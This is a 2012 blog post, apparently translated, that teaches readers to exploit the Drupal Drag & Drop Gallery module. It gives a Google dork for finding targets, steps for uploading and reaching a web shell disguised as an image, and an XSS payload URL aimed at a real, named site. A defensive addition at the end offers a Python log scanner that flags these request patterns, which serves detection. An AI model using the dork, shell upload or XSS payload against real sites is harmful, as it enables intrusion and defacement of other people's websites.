Monday, 25 June 2012

Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability



Assalamualaikum and greetings. It's been a while since I posted about upload exploits, hasn't it? OK, let me show you a new file upload exploit. This one is also vulnerable to XSS ^.^
Let's start.

1. First, search for this Google dork:
inurl:/sites/all/modules/dragdrop_gallery/



2. Pick one of the websites. Next, prepare your shell in the form shell.php.gif


then UPLOAD!


3. To access the shell, go here:
http://localhost/drupal/sites/all/modules/dragdrop_gallery/shell.php.gif



4. DONE!

5. OK, now for the XSS, it goes like this:
http://illinoispoisoncenter.org/sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=<marquee>Rea_pErz+Was+Here</marquee>

6. Change the script shown in red to your own script! DONE!


OK, that's all. Assalamualaikum....
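
For defenders, both request patterns in this post leave recognisable traces in web server access logs: a double-extension file served from the module directory, and an `nid` value that is not a node ID. The following is an added example, not part of the original post: a Python triage function run over constructed combined-format log lines. It assumes `nid` is normally a numeric Drupal node ID, and the extension list is illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

MODULE_DIR = "/sites/all/modules/dragdrop_gallery/"
# Script extension followed by a second extension, e.g. shell.php.gif (illustrative list)
DOUBLE_EXT = re.compile(r"\.(php\d?|phtml|phar)\.[a-z0-9]+$", re.I)
# Request field of a combined-format log line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(line):
    """Return a list of findings for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if MODULE_DIR not in url.path:
        return []
    findings = []
    if DOUBLE_EXT.search(url.path):
        findings.append("double-extension file requested from module directory")
    if url.path.endswith("/upload.php"):
        if m.group("method") == "POST":
            findings.append("upload to module handler")
        # parse_qs percent-decodes values, so encoded markup is caught too
        for nid in parse_qs(url.query, keep_blank_values=True).get("nid", []):
            if not nid.isdigit():
                findings.append("non-numeric nid parameter")
    return findings

def scan(lines):
    """Return (index, findings) for every line with at least one finding."""
    hits = [(i, classify(line)) for i, line in enumerate(lines)]
    return [(i, f) for i, f in hits if f]

# Constructed sample lines (documentation IP ranges), not real traffic
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Jun/2012:10:00:00 +0000] "POST /sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=1 HTTP/1.1" 200 120',
    '203.0.113.5 - - [25/Jun/2012:10:00:05 +0000] "GET /sites/all/modules/dragdrop_gallery/shell.php.gif HTTP/1.1" 200 512',
    '198.51.100.7 - - [25/Jun/2012:10:01:00 +0000] "GET /sites/all/modules/dragdrop_gallery/upload.php?filedir=/sites/default/files/dragdrop_gallery&nid=%3Cmarquee%3Etest%3C/marquee%3E HTTP/1.1" 200 300',
    '192.0.2.10 - - [25/Jun/2012:10:02:00 +0000] "GET /node/12 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    for i, findings in scan(SAMPLE_LOG):
        print(i, findings)
```

Any hit on a site that still has this module installed is a reason to inspect the module directory and the `filedir` target for unexpected files.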

Item Reviewed: Drupal Modules - Drag & Drop Gallery File Upload & XSS Vulnerability Description: Rating: 5 Reviewed By Afif Zafri
